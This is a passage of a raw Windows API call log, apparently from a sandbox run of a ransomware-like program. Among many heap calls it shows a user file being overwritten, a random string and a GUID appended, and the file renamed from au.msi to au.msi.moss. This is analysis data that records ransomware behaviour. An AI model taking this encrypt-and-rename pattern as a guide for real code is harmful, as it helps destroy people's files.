HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0173.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0173.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0173.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0173.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cad8 [0173.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0173.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0173.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0173.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0173.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0173.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0173.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0173.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0173.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0173.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0173.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0173.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0173.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e850 [0173.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0173.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0173.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0173.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0173.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0173.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0173.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0173.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e868 [0173.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0173.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0173.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0173.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e838 [0173.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0173.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4ddd0 [0173.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0173.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2c0 [0173.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0173.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dd70 [0173.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0173.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dde8 [0173.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0173.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e880 [0173.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0173.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4dd70 [0173.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dde8 | out: hHeap=0xcd0000) returned 1 [0173.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0173.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0173.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0173.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0173.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0173.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e850 | out: hHeap=0xcd0000) returned 1 [0173.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e850 [0173.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0173.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b48a18 [0173.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0173.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa27b8 [0173.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0173.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b48c28 [0173.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0173.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0x3aa28d0 [0173.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0173.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0173.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e850 | out: hHeap=0xcd0000) returned 1 [0173.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b48e40 [0173.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa27b8 | out: hHeap=0xcd0000) returned 1 [0173.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xdc53e8 [0173.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0173.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2eae0 | out: hHeap=0xcd0000) returned 1 [0173.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0173.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0173.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0173.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0173.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48c28 | out: hHeap=0xcd0000) returned 1 [0173.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48e40 | out: hHeap=0xcd0000) returned 1 [0173.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa28d0 | out: hHeap=0xcd0000) returned 1 [0173.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0173.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e880 | out: hHeap=0xcd0000) returned 1 [0173.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0173.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddd0 | out: hHeap=0xcd0000) returned 1 [0173.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0173.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e868 | out: hHeap=0xcd0000) returned 1 [0173.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e838 | out: hHeap=0xcd0000) returned 1 [0173.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0173.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0173.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0173.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e820 | out: hHeap=0xcd0000) returned 1 [0173.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b57ba0 | out: hHeap=0xcd0000) returned 1 [0173.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48a18 | out: hHeap=0xcd0000) returned 1 [0173.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0173.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cad8 | out: hHeap=0xcd0000) returned 1 [0173.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0173.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0173.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0173.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0173.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0173.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0173.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0173.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0173.029] WriteFile (in: hFile=0x664, lpBuffer=0x3b62d40*, nNumberOfBytesToWrite=0x25800, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b62d40*, lpNumberOfBytesWritten=0x401fb14*=0x25800, lpOverlapped=0x0) returned 1 [0173.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b62d40 | out: hHeap=0xcd0000) returned 1 [0173.030] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x2d400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.030] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0173.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0173.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0173.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b48820 [0173.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b48820, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0173.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48c50 [0173.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0173.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0173.031] WriteFile (in: hFile=0x664, lpBuffer=0x3b48c50*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48c50*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0173.031] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48c50 | out: hHeap=0xcd0000) returned 1 [0173.031] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0173.031] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0173.031] CloseHandle (hObject=0x664) returned 1 [0173.034] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cf88 [0173.034] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x890) returned 0x3b44498 [0173.034] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cf88 | out: hHeap=0xcd0000) returned 1 [0173.034] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi.moss")) returned 1 [0173.035] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0173.035] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0173.035] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0173.037] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609fa8 | out: hHeap=0xcd0000) returned 1 [0173.037] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7eec92c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2d400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="au.msi", cAlternateFileName="")) returned 0 [0173.037] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0173.037] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0173.037] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f1c8 | out: hHeap=0xcd0000) returned 1 [0173.037] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0173.037] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cf88 [0173.037] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0173.037] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.037] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.037] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0173.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0173.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0173.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0173.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0173.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0173.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0173.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0173.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.040] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.040] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.040] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.040] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0173.040] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.040] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0173.040] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.040] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.040] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.040] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.040] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.040] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.040] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.040] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0173.041] HeapFree 